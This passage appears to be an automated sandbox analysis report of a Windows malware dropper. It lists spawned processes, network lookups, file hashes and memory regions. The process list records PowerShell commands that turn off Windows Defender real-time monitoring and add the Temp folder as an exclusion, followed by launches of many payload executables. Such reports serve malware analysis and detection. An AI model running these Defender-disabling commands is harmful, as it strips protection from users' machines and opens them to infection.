PID 4620 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe

MD5 653f5bbaac95d546bb4c5c7557b25c22
SHA1 346e064735ca5abe0963288dd342d7ea058bb61a
SHA256 d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12
SHA512 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/4620-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4620-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4620-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-72-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4620-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3088-74-0x0000000073DDE000-0x0000000073DDF000-memory.dmp

memory/4620-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-64-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4620-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1488-75-0x0000000073DD0000-0x0000000074580000-memory.dmp

memory/4620-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12d6c3a590f5c.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue121e696b2d94fe.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue129ba086d712.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12f72da5484b.exe

MD5 7b253e0725b69672ef3d44d524de2c4c
SHA1 f3c0d9f5f984ee5d7578eeabded495094cec1031
SHA256 8b6540b22cc0be302f5c1e71de5d436a4036af18a55a0e4f185d0aaec6756d5c
SHA512 24c5808384fdb0ab8fe0b8b9e6a7fef6db39071c655f7dc6399aedf24d1e005a67e5285f752be29966de9078e47cf97427c67473fb88e0e78280b3d578a5e774

memory/4620-93-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1488-91-0x00000000051D0000-0x0000000005206000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue122eaa5d903b51f3.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

memory/1488-104-0x0000000073DD0000-0x0000000074580000-memory.dmp

memory/1488-103-0x0000000073DD0000-0x0000000074580000-memory.dmp

memory/4620-102-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-101-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3088-106-0x00000000055B0000-0x0000000005616000-memory.dmp

memory/3088-107-0x0000000005690000-0x00000000056F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igrty1qm.ehu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3088-127-0x00000000064D0000-0x00000000064EE000-memory.dmp

memory/3088-108-0x0000000005ED0000-0x0000000006224000-memory.dmp

memory/3088-128-0x0000000006A30000-0x0000000006A7C000-memory.dmp

memory/3088-105-0x00000000053F0000-0x0000000005412000-memory.dmp

memory/4620-100-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4620-99-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-97-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1488-92-0x00000000058C0000-0x0000000005EE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue123e8bf9beda40e5.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue127ff3b5477.exe

MD5 cd6d011a663a12f81ba8e4e5407e3a6f
SHA1 53c81876f0ff422d41f19c6d2ea0d30548e4e071
SHA256 c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1
SHA512 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue125fd9410f80dd6.exe

MD5 1fd5c6ee4e5c6af11015087d8d6af3b0
SHA1 21aef092eb546d508740185e38b52896fb6aea5d
SHA256 d41f88572be0063290efe714d45528ba9d467ac89e066d88f13e13a7325bc663
SHA512 5074aafa3d7030713940aa9436b1c96fdef2e7df52c68f5d97203fe0ec3af7055934e6b6cac5ba95c69310e037863b16759b1f475c4e42ab61e9acb7ed387975

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue1264f7b252.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue1239d4b60d.exe

MD5 343befc915e3428791029f5f314393b9
SHA1 47701bb5f2f8b6c5135abccec790378c3986f555
SHA256 4ca6bf1db2cb7f2f8799180ee8a56c2d96f718484a4ee3e06e32aebe6897c1da
SHA512 9381340ccad3ac5ce239908b3f90cd32ee1b835510d8ecc17b72049a49bb6613ed246d955d0a65f4970735f8cabcfd9af93417034a405d00ef193975cd1b2e5e

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12b505de68357.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue127d1be88dd70f8.exe

MD5 3476b903e6e6ff5f246460e8749fd232
SHA1 3639e6c1f104ad7aa24ab7f72aca5dad686361cf
SHA256 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002
SHA512 ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12536443c2c8.exe

MD5 3bb8763cc667a751d1653cc3634f1f83
SHA1 d2e0dc47a6085864ec65ec0fa326b4434bd7f376
SHA256 f369798e25e4c2dd109caf27fb399d2f32200e07a5550fdb48816daaa5563843
SHA512 1c5800e5b80775f33ad55a13418c039b3c56b8e532ccf8d5895c5a4e904731f76104ff6469075d093f39c902364bb8c19d048a3a4aa6b2893e03ebc4e41f160e

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12b645e6648.exe

MD5 8268aa1cba3763a79c3dd333ab42c093
SHA1 e7d034e6f55bc07b38ad50f5bb2e83f098c60c97
SHA256 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f
SHA512 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue120ba2d3df.exe

MD5 5cd1e88d510f00080fecc9d52fb97ba3
SHA1 c2d8521c2ec33026df1f07a0214b422ce12f702d
SHA256 f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470
SHA512 d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195

memory/1488-141-0x0000000070FE0000-0x000000007102C000-memory.dmp

memory/3088-140-0x0000000006A10000-0x0000000006A2E000-memory.dmp

memory/3088-130-0x0000000070FE0000-0x000000007102C000-memory.dmp

memory/3088-151-0x00000000074A0000-0x0000000007543000-memory.dmp

memory/3088-129-0x0000000006AA0000-0x0000000006AD2000-memory.dmp

memory/3088-153-0x00000000077F0000-0x000000000780A000-memory.dmp

memory/3088-152-0x0000000007E40000-0x00000000084BA000-memory.dmp

memory/3088-154-0x0000000007870000-0x000000000787A000-memory.dmp

memory/1488-155-0x0000000007D30000-0x0000000007DC6000-memory.dmp

memory/3088-156-0x00000000079F0000-0x0000000007A01000-memory.dmp

memory/1488-157-0x0000000007CF0000-0x0000000007CFE000-memory.dmp

memory/1488-158-0x0000000007D00000-0x0000000007D14000-memory.dmp

memory/1488-159-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

memory/1488-160-0x0000000007DE0000-0x0000000007DE8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bc8c31ff0a9d481b9101d28bb442ecdc
SHA1 35af27ec03d74f3386e7ca6a02cfe7f6c14ebe36
SHA256 822cd0e571e27ca900d378f9bea491c57906c39bbd83a220eefb366e31b80443
SHA512 4b61815dcfd2604fa1885d73a24c9a63344c5112aa27e4bb2b7aef08f01608d4af85b7bcdec814b70ad037a89b94dd398f7af84fda5c80e6266346f61d0e5158

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/1488-166-0x0000000073DD0000-0x0000000074580000-memory.dmp